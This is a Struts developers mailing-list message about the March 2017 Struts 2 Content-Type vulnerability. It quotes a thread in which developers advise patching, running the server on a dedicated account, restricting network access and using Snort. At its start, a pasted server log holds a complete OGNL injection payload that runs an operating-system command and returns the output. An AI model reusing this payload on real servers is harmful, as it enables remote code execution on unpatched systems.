Looking at my logs I can see some activity: GRRR : 179.253.10.27 - - [24/Mar/2017:08:39:13 +0000] "GET /notFound.action HTTP/1.1" 404 2258 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
2017-03-24 08:39:13,649 WARN org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest JakartaMultiPartRequest:parse - Request exceeded size limit! org.apache.commons.fileupload.FileUploadBase$InvalidContentTypeException: the request doesn't contain a multipart/form-data or multipart/mixed stream, content type header is %{(#nike='multipart/form-data' ).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_ memberAccess?(#_memberAccess=#dm):((#container=#context[' com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container. getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil. getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()). (#context.setMemberAccess(#dm)))).(#cmd='nMaskCustomMuttMoloz').(# iswin=(@java.lang.System@getProperty('os.name'). toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/ c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(# cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@ org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@ org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros. flush())} On 16 March 2017 at 12:45, Martin Gainty <mgai...@hotmail.com> wrote: > > > > > ________________________________ > From: Greg Huber <gregh3...@gmail.com> > Sent: Thursday, March 16, 2017 5:19 AM > To: Struts Developers List > Subject: Re: S2 makes Hacker News :/ > > Just because you are using s2, does not necessarily mean you are affected, > all I get is a response : > > HTTP/1.1 404 > Content-Length: 0 > Date: Thu, 16 Mar 2017 09:02:54 GMT > Connection: close > > Looking at my logs this fishing is going on all the time. > > MG>from what i read injections only happen with Content-Type injection > > MG>then again patches Struts 2.3.32 or 2.5.10.1 has been available for > some time > > MG>Johannes suggests implementing 'snort' to detect injection > vulnerability reference link at sans.edu below: > https://isc.sans.edu/forums/diary/Critical+Apache+Struts+ > 2+Vulnerability+Patch+Now/22169/ > > MG>Thanks Lukasz! > > Thanks also Lukasz for the quick fix. > > Cheers Greg > > > > > On 14 March 2017 at 18:17, Lukasz Lenart <lukaszlen...@apache.org> wrote: > > > 2017-03-14 15:57 GMT+01:00 Doug Erickson <erick...@part.net>: > > > What is the proper server setup to prevent this? > > > > Upgrade to the latest Struts version ... and run server on a dedicated > > account, block access to the world (sever should be only allowed to > > connect to localhost) and few other things > > > > > > Regards > > -- > > Łukasz > > + 48 606 323 122 http://www.lenart.org.pl/ > Łukasz Lenart - strona domowa<http://www.lenart.org.pl/> > www.lenart.org.pl > pasja ciągle coś nowego. programowanie, tworzenie jest dla mnie życiową > pasją, jak dotąd udaje mi sie łączyć to co lubię z tym za co mi płacą i ... > > > > > > > --------------------------------------------------------------------- > > To unsubscribe, e-mail: dev-unsubscr...@struts.apache.org > > For additional commands, e-mail: dev-h...@struts.apache.org > > > > >